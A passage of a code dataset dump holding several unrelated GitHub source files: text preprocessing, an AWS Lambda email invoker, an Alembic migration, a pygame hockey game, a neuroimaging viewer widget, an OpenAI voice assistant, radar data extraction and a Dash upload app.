re.sub(\"\\|\", \"\", text)\n text = re.sub(\"\\[image\\]\", \"\", text)\n # Removing stop words\n f = open(SETTINGS.stop_words_file)\n stop_words = f.read().splitlines()\n text = \" \".join(word for word in text.split() if word.lower() not in stop_words)\n\n \n return text","repo_name":"amateurCoder/ComplianceBot","sub_path":"complianceBot/code/DataIndexing/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28851787308","text":"import json\nimport requests\n\ndef lambda_handler(event, context):\n to_address = event['to_address']\n message = event['message']\n subject = event['subject']\n\n url = \"https://.execute-api.us-west-2.amazonaws.com//\" # Invoke url for the api\n params = {'to_address': to_address, 'message': message, 'subject': subject}\n resp = requests.get(url, params=params)\n return resp.status_code","repo_name":"paulang1807/code-snippets","sub_path":"aws/lambda_ses_email_invoke_sample.py","file_name":"lambda_ses_email_invoke_sample.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23560530370","text":"\"\"\"add skills table\n\nRevision ID: ee611766a455\nRevises: caabe4a750bf\nCreate Date: 2018-07-10 21:56:17.020078\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ee611766a455'\ndown_revision = 'caabe4a750bf'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('skills',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('first_skill', sa.String(length=128), nullable=True),\n sa.Column('second_skill', sa.String(length=128), nullable=True),\n sa.Column('third_skill', sa.String(length=128), nullable=True),\n sa.Column('fourth_skill', sa.String(length=128), nullable=True),\n sa.Column('fifth_skill', sa.String(length=128), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('skills')\n # ### end Alembic commands ###\n","repo_name":"mybestnickname/flask_project","sub_path":"migrations/versions/ee611766a455_add_skills_table.py","file_name":"ee611766a455_add_skills_table.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6217145422","text":"import pygame as pg\nimport sys\n\n\nclass Screen:\n def __init__(self, title, wh):\n pg.display.set_caption(title)\n self.sfc = pg.display.set_mode(wh) # Surface\n self.rct = self.sfc.get_rect() # Rect\n self.bgi_sfc = pg.Surface((1600,900)) # Surface\n pg.draw.rect(self.bgi_sfc, (0,0,0), (0,0,1600,900)) #黒の背景のRect\n self.bgi_rct = self.bgi_sfc.get_rect() # Rect\n\n def blit(self):\n self.sfc.blit(self.bgi_sfc, self.bgi_rct)\n\n\nclass Ball:\n def __init__(self, color, size, vxy, scr: Screen):\n self.sfc = pg.Surface((2*size, 2*size)) # Surface\n self.sfc.set_colorkey((0, 0, 0)) \n pg.draw.circle(self.sfc, color, (size, size), size)\n self.rct = self.sfc.get_rect() # Rect\n self.rct.centerx = scr.rct.width//2\n self.rct.centery = scr.rct.height//2 \n self.vx, self.vy = vxy # 画面の中央からスタートする\n\n def blit(self, scr: Screen):\n scr.sfc.blit(self.sfc, self.rct)\n\n def update(self, scr: Screen):\n self.rct.move_ip(self.vx, self.vy)\n yoko, tate = check_bound(self.rct, scr.rct)\n self.vx *= yoko\n self.vy *= tate \n self.blit(scr) \n\n\nclass Bar: # ボールをはじくバーのクラス\n def __init__(self, color, xy):\n self.sfc = pg.Surface((40,300)) #Surface\n self.sfc.convert()\n self.sfc.fill(color) #指定しているカラーの色にする\n self.rct = self.sfc.get_rect()\n self.rct.center = xy\n \n def blit(self, scr:Screen):\n scr.sfc.blit(self.sfc, self.rct)\n \n def update(self, scr: Screen): #上と下のキーで動く\n key_states = pg.key.get_pressed() # 辞書\n if key_states[pg.K_UP]: \n self.rct.centery -= 1\n if key_states[pg.K_DOWN]: \n self.rct.centery += 1\n if check_bound(self.rct, scr.rct) != (1, 1): # 領域外だったら\n if key_states[pg.K_UP]: \n self.rct.centery += 1\n if key_states[pg.K_DOWN]: \n self.rct.centery -= 1\n self.blit(scr)\n\n def update2(self, scr: Screen): #wとsのキーで動く\n key_states = pg.key.get_pressed() # 辞書\n if key_states[pg.K_w]: \n self.rct.centery -= 1\n if key_states[pg.K_s]: \n self.rct.centery += 1\n if check_bound(self.rct, scr.rct) != (1, 1): # 領域外だったら\n if key_states[pg.K_w]: \n self.rct.centery += 1\n if key_states[pg.K_s]: \n self.rct.centery -= 1\n self.blit(scr)\n\n\nclass Score: #点数のクラス\n def __init__(self, score1, score2):\n self.fonto = pg.font.Font(None, 100)\n self.txt = self.fonto.render(f\"{score2} {score1}\", True, (255,255,255)) #黒でスコアを表示する\n\n def blit(self, scr: Screen):\n scr.sfc.blit(self.txt,(scr.rct.width//2-50,50)) \n\n def update(self, scr: Screen):\n self.blit(scr)\n\n\n\ndef main():\n clock = pg.time.Clock()\n scr = Screen(\"ホッケーゲーム\", (1600, 900))\n bar1 = Bar((0,255,0), (scr.rct.width-21, scr.rct.height//2))\n bar2 = Bar((0,0,255), (21, scr.rct.height//2))\n bll = Ball((255,0,0), 25, (2.5,2.5), scr)\n score1 = 0\n score2 = 0\n \n while True:\n sb = Score(score1, score2)\n scr.blit()\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n return\n\n if bar1.rct.colliderect(bll.rct):\n bll.vx*= -1\n if bar2.rct.colliderect(bll.rct):\n bll.vx*= -1\n if bll.rct.centerx < 25:\n score1+=1\n if bll.rct.centerx > scr.rct.width-25:\n score2+=1\n if score1>=5 and score1-score2 >=2:\n return \n elif score2>=5 and score2-score1 >=2:\n return\n bll.update(scr)\n bar1.update(scr)\n bar2.update2(scr)\n sb.update(scr)\n pg.display.update()\n clock.tick(1000)\n\n\ndef check_bound(rct, scr_rct):\n '''\n [1] rct: こうかとん or 爆弾のRect\n [2] scr_rct: スクリーンのRect\n '''\n yoko, tate = +1, +1 # 領域内\n if rct.left < scr_rct.left or scr_rct.right < rct.right : yoko = -1 # 領域外\n if rct.top < scr_rct.top or scr_rct.bottom < rct.bottom: tate = -1 # 領域外\n return yoko, tate\n\n\nif __name__ == \"__main__\":\n pg.init()\n main()\n pg.quit()\n sys.exit()","repo_name":"c0a21098/ProjExD","sub_path":"ex06/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"19613450326","text":"from __future__ import absolute_import, print_function\n\nimport os\n\nfrom PyQt5.QtGui import QIcon, QMessageBox\nfrom PyQt5.QtWidgets import QHBoxLayout, QToolButton\nfrom soma.qt_gui.qt_backend import Qt, QtCore\n\nfrom populse_mia.data_manager.project import COLLECTION_CURRENT, TAG_FILENAME\nfrom populse_mia.software_properties import Config\nfrom populse_mia.user_interface.data_browser.data_browser import (\n TableDataBrowser,\n)\nfrom populse_mia.user_interface.data_browser.rapid_search import RapidSearch\nfrom populse_mia.user_interface.data_viewer.anatomist_2 import ( # noqa: F401\n resources,\n)\nfrom populse_mia.user_interface.data_viewer.anatomist_2.anasimpleviewer2 import ( # noqa: E501\n AnaSimpleViewer2,\n)\n\nfrom ..data_viewer import DataViewer\n\nnot_defined_value = \"*Not Defined*\"\n\n\nclass MiaViewer(Qt.QWidget, DataViewer):\n \"\"\"\n :class:`MIA data viewer\n `\n implementation based on\n `PyAnatomist `_\n\n .. Methods:\n - close: Exit\n - display_files: Load objects in files and display\n - displayed_files: Get the list of displayed files\n - filter_documents: Filter documents already loaded in the Databrowser\n - preferences: Preferences for the dataviewer\n - remove_files: Delete the given objects given by their file names\n - reset_search_bar: Reset the rapid search bar\n - screenshot: The screenshot of mia_anatomist_2\n - search_str: Update the *Not Defined*\" values in visualised documents\n - set_documents: Initialise current documents in the viewer\n\n \"\"\"\n\n def __init__(self, init_global_handlers=None):\n super(MiaViewer, self).__init__()\n\n self.anaviewer = AnaSimpleViewer2(init_global_handlers)\n\n # count global number of viewers using anatomist, in order to close it\n # nicely\n if not hasattr(DataViewer, \"mia_viewers\"):\n DataViewer.mia_viewers = 0\n DataViewer.mia_viewers += 1\n\n def findChild(x, y):\n return Qt.QObject.findChild(x, Qt.QObject, y)\n\n awidget = self.anaviewer.awidget\n filter_action = findChild(awidget, \"filterAction\")\n preferences_action = findChild(awidget, \"actionPreferences\")\n screenshot_action = findChild(awidget, \"actionprint_view\")\n\n filter_action.triggered.connect(self.filter_documents)\n preferences_action.triggered.connect(self.preferences)\n screenshot_action.triggered.connect(self.screenshot)\n\n layout = Qt.QVBoxLayout()\n self.setLayout(layout)\n self.anaviewer.awidget.setSizePolicy(\n Qt.QSizePolicy.Expanding, Qt.QSizePolicy.Expanding\n )\n layout.addWidget(self.anaviewer.awidget)\n\n self.project = None\n self.documents = []\n self.displayed = []\n self.table_data = []\n\n def close(self):\n \"\"\"Exit\"\"\"\n super(MiaViewer, self).close()\n close_ana = False\n DataViewer.mia_viewers -= 1 # dec count\n if DataViewer.mia_viewers == 0:\n close_ana = True\n self.anaviewer.closeAll(close_ana)\n\n def display_files(self, files):\n \"\"\"Load objects in files and display\"\"\"\n self.displayed += files\n self.anaviewer.loadObject(files)\n\n def displayed_files(self):\n \"\"\"Get the list of displayed files\"\"\"\n return self.displayed\n\n def filter_documents(self):\n \"\"\"Filter documents already loaded in the Databrowser\"\"\"\n dialog = Qt.QDialog()\n dialog.setWindowTitle(\"Filter documents\")\n dialog.resize(1150, 500)\n layout = Qt.QVBoxLayout()\n dialog.setLayout(layout)\n\n # Some specific filtering\n # QLineEdit for research\n self.search_bar = RapidSearch(dialog)\n self.search_bar.textChanged.connect(self.search_str)\n # Cancel search button\n sources_images_dir = Config().getSourceImageDir()\n button_cross = QToolButton()\n button_cross.setStyleSheet(\"background-color:rgb(255, 255, 255);\")\n button_cross.setIcon(\n QIcon(os.path.join(sources_images_dir, \"gray_cross.png\"))\n )\n button_cross.clicked.connect(self.reset_search_bar)\n\n title = Qt.QLabel()\n title.setText(\"Search by FileName: \")\n\n layout.addWidget(title)\n\n search_bar_layout = QHBoxLayout()\n search_bar_layout.addWidget(self.search_bar)\n search_bar_layout.addSpacing(3)\n search_bar_layout.addWidget(button_cross)\n # Add layout to dialogBox\n layout.addLayout(search_bar_layout)\n layout.addSpacing(8)\n\n self.table_data = TableDataBrowser(\n self.project,\n self,\n self.project.session.get_shown_tags(),\n False,\n True,\n link_viewer=False,\n )\n layout.addWidget(self.table_data)\n hlay = Qt.QHBoxLayout()\n layout.addLayout(hlay)\n ok = Qt.QPushButton(\"Import\")\n hlay.addWidget(ok)\n ok.clicked.connect(dialog.accept)\n ok.setDefault(True)\n cancel = Qt.QPushButton(\"Cancel\")\n hlay.addWidget(cancel)\n cancel.clicked.connect(dialog.reject)\n hlay.addStretch(1)\n\n # Reducing the list of scans to selection\n all_scans = self.table_data.scans_to_visualize\n self.table_data.scans_to_visualize = self.documents\n self.table_data.scans_to_search = self.documents\n self.table_data.update_visualized_rows(all_scans)\n\n res = dialog.exec_()\n if res == Qt.QDialog.Accepted:\n points = self.table_data.selectedIndexes()\n result_names = []\n for point in points:\n row = point.row()\n # We get the FileName of the scan from the first row\n scan_name = self.table_data.item(row, 0).text()\n value = self.project.session.get_value(\n COLLECTION_CURRENT, scan_name, TAG_FILENAME\n )\n value = os.path.abspath(\n os.path.join(self.project.folder, value)\n )\n result_names.append(value)\n self.display_files(result_names)\n\n def preferences(self):\n \"\"\"Preferences for the dataviewer\"\"\"\n # Get initial config:\n im_sec = Config().getViewerFramerate()\n config = Config().getViewerConfig()\n ref = Config().get_referential()\n\n dialog = Qt.QDialog()\n dialog.setWindowTitle(\"Preferences\")\n dialog.resize(600, 400)\n layout = Qt.QVBoxLayout()\n layout.setContentsMargins(25, 25, 25, 25)\n dialog.setLayout(layout)\n\n # Change Neuro/Radio configuration\n config_layout = QHBoxLayout()\n title_config = Qt.QLabel()\n title_config.setText(\"Configuration: \")\n box = Qt.QComboBox()\n box.addItem(\"Neuro\")\n box.addItem(\"Radio\")\n config_layout.addWidget(title_config)\n config_layout.addWidget(box)\n if config == \"radio\":\n box.setCurrentIndex(1)\n\n # set automatic time frame rate\n frame_rate_layout = QHBoxLayout()\n title = Qt.QLabel()\n title.setText(\"Automatic time image display:\")\n slider = Qt.QSlider(Qt.Qt.Horizontal)\n slider.setRange(1, 100)\n slider.setValue(int(im_sec))\n size = QtCore.QSize(180, 15)\n slider.setMinimumSize(size)\n slow_label = Qt.QLabel()\n fast_label = Qt.QLabel()\n slow_label.setText(\"slow\")\n fast_label.setText(\"fast\")\n frame_rate_layout.addWidget(title)\n frame_rate_layout.addWidget(slow_label)\n frame_rate_layout.addWidget(slider)\n frame_rate_layout.addWidget(fast_label)\n frame_rate_layout.insertSpacing(1, 200)\n\n # Change referential\n ref_layout = QHBoxLayout()\n title_ref = Qt.QLabel()\n title_ref.setText(\"Referential: \")\n box2 = Qt.QComboBox()\n box2.addItem(\"World Coordinates\")\n box2.addItem(\"Image referential\")\n ref_layout.addWidget(title_ref)\n ref_layout.addWidget(box2)\n box2.setCurrentIndex(int(ref))\n\n # Set general vertical layout\n layout.addLayout(config_layout)\n layout.addLayout(frame_rate_layout)\n layout.addLayout(ref_layout)\n layout.addStretch(1)\n\n # Save and cancel buttons\n hlay = Qt.QHBoxLayout()\n layout.addLayout(hlay)\n ok = Qt.QPushButton(\"Save\")\n hlay.addStretch(1)\n hlay.addWidget(ok)\n ok.clicked.connect(dialog.accept)\n ok.setDefault(True)\n cancel = Qt.QPushButton(\"Cancel\")\n hlay.addWidget(cancel)\n cancel.clicked.connect(dialog.reject)\n hlay.addStretch(1)\n\n res = dialog.exec_()\n\n if res == Qt.QDialog.Accepted:\n new_config = box.currentText().lower()\n new_ref = box2.currentIndex()\n\n # Save Config parameters and reload images\n # when config and referential have changed\n Config().setViewerFramerate(slider.value())\n Config().setViewerConfig(new_config)\n Config().set_referential(new_ref)\n if new_config != config:\n self.anaviewer.changeConfig(new_config)\n if new_ref != ref:\n self.anaviewer.changeRef()\n\n def remove_files(self, files):\n \"\"\"Delete the given objects given by their file names\"\"\"\n self.anaviewer.deleteObjectsFromFiles(files)\n self.files = [doc for doc in self.displayed if doc not in files]\n\n def reset_search_bar(self):\n \"\"\"Reset the rapid search bar\"\"\"\n self.search_bar.setText(\"\")\n\n def screenshot(self):\n \"\"\"The screenshot of mia_anatomist_2\"\"\"\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n msg.setText(\"Not yet implemented!\")\n msg.setWindowTitle(\"Information\")\n msg.setStandardButtons(QMessageBox.Ok)\n msg.buttonClicked.connect(msg.close)\n msg.exec()\n\n def search_str(self, str_search):\n \"\"\"Search a string in the table and updates the\n not_defined_value = \"*Not Defined*\" in visualized documents.\n\n :param str_search: string to search\n \"\"\"\n\n old_scan_list = self.table_data.scans_to_visualize\n return_list = []\n\n # Every scan taken if empty search\n if str_search == \"\":\n return_list = self.table_data.scans_to_search\n else:\n # Scans with at least a not defined value\n if str_search == not_defined_value:\n filter = self.search_bar.prepare_not_defined_filter(\n self.project.session.get_shown_tags()\n )\n # Scans matching the search\n else:\n filter = self.search_bar.prepare_filter(\n str_search,\n self.project.session.get_shown_tags(),\n self.table_data.scans_to_search,\n )\n\n generator = self.project.session.filter_documents(\n COLLECTION_CURRENT, filter\n )\n\n # Creating the list of scans\n return_list = [getattr(scan, TAG_FILENAME) for scan in generator]\n\n self.table_data.scans_to_visualize = return_list\n\n # Rows updated\n self.table_data.update_visualized_rows(old_scan_list)\n\n self.project.currentFilter.search_bar = str_search\n\n def set_documents(self, project, documents):\n \"\"\"Initialise current documents in the viewer\"\"\"\n if self.project is not project:\n self.clear()\n self.project = project\n self.documents = documents\n","repo_name":"populse/populse_mia","sub_path":"populse_mia/user_interface/data_viewer/anatomist_2/mia_anatomist.py","file_name":"mia_anatomist.py","file_ext":"py","file_size_in_byte":11760,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"9366576002","text":"from aodh import notifier\n\n\nclass TestAlarmNotifier(notifier.AlarmNotifier):\n \"Test alarm notifier.\"\"\"\n\n def __init__(self, conf):\n super(TestAlarmNotifier, self).__init__(conf)\n self.notifications = []\n\n def notify(self, action, alarm_id, alarm_name, severity,\n previous, current, reason, reason_data):\n self.notifications.append((action,\n alarm_id,\n alarm_name,\n severity,\n previous,\n current,\n reason,\n reason_data))\n","repo_name":"openstack/aodh","sub_path":"aodh/notifier/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"} +{"seq_id":"16926802","text":"import os\nimport openai\nfrom cortana.model.text_to_audio import text_to_speech_pyttsx3, text_to_speech_gtts\nfrom cortana.model.audio_to_text import speech_to_text_google, wait_for_call\nfrom cortana.model.predefined_answers import predefined_answers, text_command_detector\n\nclass cortana():\n def __init__(self, model_name, language='english', role=None, api_key=None,):\n print('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\n print(f' Cortana ({language})')\n print('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\n if api_key is None or api_key=='':\n from api_key import secret_key\n openai.api_key = secret_key\n else:\n openai.api_key = api_key\n # Model to use\n self.model_name = model_name\n \n # Option of voice\n self.option_talk = None\n self.name = None\n self.language = language\n\n # Initialize \n self.answers = predefined_answers[language]\n self.reset_messages(role)\n self.log = None\n\n\n @staticmethod\n def list_model():\n print(openai.Model.list())\n\n def change_model(self, model_name):\n self.model_name = model_name\n\n def prompt(self, input_, max_tokens=20, temperature=0.4, **kwargs):\n # Parameters\n print_ = kwargs.get('print', True)\n if not isinstance(input_, str):\n raise Exception(f'input must be of type str, currently is {type(input_)}')\n else:\n self.last_input = input_\n \n # Update message list\n self.messages.append({'role':'user', \"content\":self.last_input})\n \n # ChatCompletion\n completion = openai.ChatCompletion.create(model=self.model_name,\n messages=self.messages,\n max_tokens=max_tokens,\n temperature=temperature,\n **kwargs)\n answer = completion.choices[0].message[\"content\"]\n \n # Update messages\n self.messages.append({'role':'assistant', \"content\":answer})\n self.log = completion\n self.last_answer = answer\n \n # Print\n if print_:\n print('----------------------')\n pronoun = self.answers['pronoun']\n print(f'{pronoun}: {self.last_input}')\n print('----------------------')\n print(f'Cortana: {self.last_answer}')\n print('****************************')\n \n def voice_cortana(self, text, option_talk='pyttsx3', **kwargs):\n if self.option_talk is None:\n self.option_talk = option_talk\n \n if self.option_talk==\"pyttsx3\":\n if self.name is None:\n self.name = kwargs.get('name', 'Zira')\n text_to_speech_pyttsx3(text, self.name)\n elif self.option_talk==\"gtts\":\n if self.language == 'english':\n language = 'en'\n elif self.language == 'french':\n language = 'fr'\n text_to_speech_gtts(text, language=language)\n \n def listen_cortana(self, *args, option_talk=\"pyttsx3\", **kwargs):\n self.prompt(*args, **kwargs)\n self.voice_cortana(self.last_answer, option_talk, **kwargs)\n \n def cortana_listen(self):\n if self.language == 'english':\n language = 'en-US'\n elif self.language == 'french':\n language = 'fr-FR'\n success=False\n counter=0\n while not success and counter<2:\n counter+=1 # Increment counter\n print(self.answers['listening'])\n response = speech_to_text_google(language)\n success = response['success']\n if success:\n text = response['transcription']\n else:\n text = self.answers['error']\n self.voice_cortana(text)\n text = None\n if response['error'] is not None:\n text = None\n return text, success\n \n def talk_with_cortana(self, *args, **kwargs):\n \n # Language selector\n if self.language == 'english':\n language = 'en-US'\n elif self.language == 'french':\n language = 'fr-FR'\n # For french you must choose google to-text-speech\n if kwargs.get('option_talk', 'gtts') != 'gtts':\n kwargs['option_talk'] = 'gtts'\n \n # Welcoming message\n self.voice_cortana(self.answers['text_start'], **kwargs)\n condition = True\n while condition:\n # Get the text from your audio speech\n text, success = self.cortana_listen()\n \n # Check if a specific command has been used\n if text is not None:\n command = text_command_detector(text, self.language)\n else:\n command = None\n \n # Send the text to cortana\n if (command is None) and (text is not None and success):\n self.listen_cortana(text, *args, **kwargs) \n # Put cortana in pause\n elif (command =='activated_pause') or (text is None):\n self.voice_cortana(self.answers['text_idle'], **kwargs)\n condition = wait_for_call('Cortana', self.answers['commands']['idle_quit'], language)\n if condition:\n self.voice_cortana(self.answers['response'], **kwargs)\n # Shut down cortana\n elif command =='activated_quit':\n condition = False\n self.voice_cortana(self.answers['text_close'])\n print(' ---- Protocol Terminated ----')\n\n def show_log(self):\n print(self.log)\n \n def reset_messages(self, role=None):\n if role is None:\n role = self.answers['role']\n self.messages=[{'role': \"system\", \"content\":role}]\n\ndef button_click(language, api_key=None, max_tokens=200, option_talk='gtts'):\n name = \"gpt-3.5-turbo\"\n my_cortana = cortana(name, language, api_key=api_key) \n my_cortana.talk_with_cortana(max_tokens=max_tokens, option_talk=option_talk)\n\n\n","repo_name":"ManuNeuro/cortana","sub_path":"model/cortana_class.py","file_name":"cortana_class.py","file_ext":"py","file_size_in_byte":6225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11598931582","text":"from .radarpolar_extract import extract_polar_data\n\n\ndef extractRadarPolar(\n dirMdvDate,\n start_time,\n end_time,\n fields,\n points,\n sweeps=-1,\n pia=None,\n dbz_fields=None,\n filter=None,\n filter_fields=None,\n apply_cmd=False,\n time_zone=\"Africa/Kigali\",\n):\n \"\"\"\n Extract radar polar data over a given points.\n\n Parameters\n ----------\n dirMdvDate: string\n full path to the folders containing the folders dates of the mdv files\n start_time: string\n The start time same time zone as \"time_zone\", format \"YYYY-mm-dd HH:MM\"\n end_time: string\n The end time same time zone as \"time_zone\", format \"YYYY-mm-dd HH:MM\"\n fields: list\n List of the fields to extract\n points: list of dictionary\n A list of the dictionary of the points to extract, format\n [{\"id\": \"id_point1\", \"longitude\": value_lon, \"latitude\": value_lat}, {...}, ...]\n sweeps: integer or list of integer\n A list of the index of elevation angles to be extracted in integer, or -1 to extract all available elevation angles\n pia: dictionary or None\n Dictionary of the method and parameters to use to perform an attenuation correction\n for the reflectivity fields before extraction.\n Default None, no attenuation correction performed.\n dbz_fields: list or None\n List of reflectivity fields to correct the attenuation. Must be in \"fields\". Default None\n filter: dictionary\n Dictionary of the method and parameters to use to filter the fields before extraction.\n Default None, no filter applied.\n filter_fields: list or None\n List of fields in which the filter will be applied. Must be in \"fields\". Default None\n apply_cmd: boolean\n Apply clutter mitigation decision to the fields. Default False\n time_zone: string\n The time zone of \"start_time\", \"end_time\" and the output extracted data.\n Options: \"Africa/Kigali\" or \"UTC\". Default \"Africa/Kigali\"\n\n Returns\n -------\n Return a dictionary of\n points: the original points used to extract the data\n date: list of dates of the extracted data\n elevation_angle: list of the elevation angles of the extracted data\n data: dictionary of longitude, latitude, altitude and the fields in the form of 3d list\n dimension: (len(date) x len(elevation_angle) x len(points))\n \"\"\"\n\n if pia is not None:\n if pia[\"method\"] == \"kdp\":\n pia_pars = {\"gamma\": 0.8}\n if \"pars\" in pia:\n if \"gamma\" in pia[\"pars\"]:\n pia_pars[\"gamma\"] = pia[\"pars\"][\"gamma\"]\n else:\n pia_pars = {\n \"a_max\": 0.0002,\n \"a_min\": 0,\n \"n_a\": 10,\n \"b_max\": 0.7,\n \"b_min\": 0.65,\n \"n_b\": 6,\n \"sector_thr\": 10,\n \"constraints\": \"none\",\n }\n\n if \"pars\" in pia:\n if \"constraints\" in pia[\"pars\"]:\n pia_pars[\"constraints\"] = pia[\"pars\"][\"constraints\"]\n\n if pia[\"pars\"][\"constraints\"] == \"dbz\":\n if \"constraint_args_dbz\" in pia[\"pars\"]:\n pia_pars[\"constraint_args_dbz\"] = pia[\"pars\"][\n \"constraint_args_dbz\"\n ]\n else:\n pia_pars[\"constraint_args_dbz\"] = 60\n\n if pia[\"pars\"][\"constraints\"] == \"pia\":\n if \"constraint_args_pia\" in pia[\"pars\"]:\n pia_pars[\"constraint_args_pia\"] = pia[\"pars\"][\n \"constraint_args_pia\"\n ]\n else:\n pia_pars[\"constraint_args_pia\"] = 20\n\n if pia[\"pars\"][\"constraints\"] == \"both\":\n if \"constraint_args_dbz\" in pia[\"pars\"]:\n pia_pars[\"constraint_args_dbz\"] = pia[\"pars\"][\n \"constraint_args_dbz\"\n ]\n else:\n pia_pars[\"constraint_args_dbz\"] = 60\n\n if \"constraint_args_pia\" in pia[\"pars\"]:\n pia_pars[\"constraint_args_pia\"] = pia[\"pars\"][\n \"constraint_args_pia\"\n ]\n else:\n pia_pars[\"constraint_args_pia\"] = 20\n\n d_name = [\n \"a_max\",\n \"a_min\",\n \"n_a\",\n \"b_max\",\n \"b_min\",\n \"n_b\",\n \"sector_thr\",\n ]\n p_name = list(pia[\"pars\"].keys())\n inm = [x in d_name for x in pia[\"pars\"]]\n if any(inm):\n p_name = [i for (i, v) in zip(p_name, inm) if v]\n for n in p_name:\n pia_pars[n] = pia[\"pars\"][n]\n\n pia[\"pars\"] = pia_pars\n\n #######\n if filter is not None:\n if filter[\"method\"] == \"median_filter_censor\":\n filter_pars = {\n \"median_filter_len\": 5,\n \"minsize_seq\": 3,\n \"censor_field\": \"RHOHV\",\n \"censor_thres\": 0.8,\n }\n elif filter[\"method\"] == \"median_filter\":\n filter_pars = {\"median_filter_len\": 5, \"minsize_seq\": 3}\n else:\n filter_pars = {\"window_len\": 5, \"window\": \"hanning\"}\n\n ##\n d_name = list(filter_pars.keys())\n if \"pars\" in filter:\n f_name = list(filter[\"pars\"].keys())\n inm = [x in d_name for x in f_name]\n if any(inm):\n f_name1 = [i for (i, v) in zip(f_name, inm) if v]\n for n in f_name1:\n filter_pars[n] = filter[\"pars\"][n]\n\n if filter[\"method\"] == \"median_filter_censor\":\n if \"censor_field\" in f_name:\n if \"censor_thres\" not in f_name:\n if filter[\"pars\"][\"censor_field\"] == \"RHOHV\":\n filter_pars[\"censor_thres\"] = 0.8\n elif filter[\"pars\"][\"censor_field\"] == \"NCP\":\n filter_pars[\"censor_thres\"] = 0.5\n else:\n filter_pars[\"censor_thres\"] = 3\n\n ##\n filter[\"pars\"] = filter_pars\n\n #######\n\n return extract_polar_data(\n dirMDV=dirMdvDate,\n source=None,\n start_time=start_time,\n end_time=end_time,\n fields=fields,\n points=points,\n sweeps=sweeps,\n pia=pia,\n dbz_fields=dbz_fields,\n filter=filter,\n filter_fields=filter_fields,\n apply_cmd=apply_cmd,\n time_zone=time_zone,\n )\n\n\ndef polarExtractedTable(x):\n \"\"\"\n Convert to table extracted radar polar data.\n\n Parameters\n ----------\n x: dictionary\n Output from extractRadarPolar\n Returns\n -------\n A list of dictionaries\n \"\"\"\n var = list(x[\"data\"].keys())\n\n out = list()\n for p in range(len(x[\"coords\"])):\n for e in range(len(x[\"elevation_angle\"])):\n for d in range(len(x[\"date\"])):\n pt = x[\"coords\"][p]\n tab = {\n \"points_id\": pt[\"id\"],\n \"points_longitude\": pt[\"longitude\"],\n \"points_latitude\": pt[\"latitude\"],\n \"dates\": x[\"date\"][d],\n \"elevation_angle\": x[\"elevation_angle\"][e],\n }\n for v in var:\n tab[v] = x[\"data\"][v][d][e][p]\n out = out + [tab]\n\n return out\n","repo_name":"rijaf-iri/mtorwaradar","sub_path":"mtorwaradar/api/radarpolar_extract_loc.py","file_name":"radarpolar_extract_loc.py","file_ext":"py","file_size_in_byte":7827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70476586088","text":"#!/usr/bin/env python3\n\n# https://docs.faculty.ai/user-guide/apps/examples/dash_file_upload_download.html\n# https://www.roytuts.com/python-flask-rest-api-file-upload/\n\nimport base64\nimport os\nimport requests\nfrom urllib.parse import quote as urlquote\nfrom flask import Flask, send_from_directory, request\n#from flask_caching import Cache\nimport dash\nimport plotly.graph_objs as go\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\n\nUPLOAD_DIRECTORY = \"/data/\"\nif not os.path.exists(UPLOAD_DIRECTORY):\n os.makedirs(UPLOAD_DIRECTORY)\n\nIMAGES_DIRECTORY = UPLOAD_DIRECTORY+'images'\nif not os.path.exists(IMAGES_DIRECTORY):\n os.makedirs(IMAGES_DIRECTORY)\n \nexternal_stylesheets = [\n 'https://codepen.io/chriddyp/pen/bWLwgP.css',\n './center.css'\n]\n\n# Normally, Dash creates its own Flask server internally. By creating our own,\n# we can create a route for downloading files directly:\nserver = Flask(__name__, static_folder='/data/images') # use mienheld instead\napp = dash.Dash(server=server, external_stylesheets=external_stylesheets)\n\n\ncolors = {\n \"graphBackground\": \"#F5F5F5\",\n \"background\": \"#ffffff\",\n \"text\": \"#000000\"\n}\n\n\napp.layout = html.Div([\n html.H1(\"ULTRA ADVANCED CAT V.S. DOG IDENTIFIER.\"),\n html.H2(\"Patent Pending.\"),\n dcc.Upload(\n id='upload-data',\n children=html.Div([\n 'Drag and Drop images of cats or dogs, or ',\n html.A('Select Files')\n ]),\n style={\n 'width': '100%',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin': '10px'\n },\n # Allow multiple files to be uploaded\n multiple=True\n ),\n html.H2(\"Files\"),\n dcc.Store(id='files-db', storage_type='session'),\n html.Ul(id=\"file-list\"),\n dcc.Graph(id='cats-dogs'),\n html.Div(id='output-data-upload')\n], style={'max-width': '1000px', 'margin' : '0 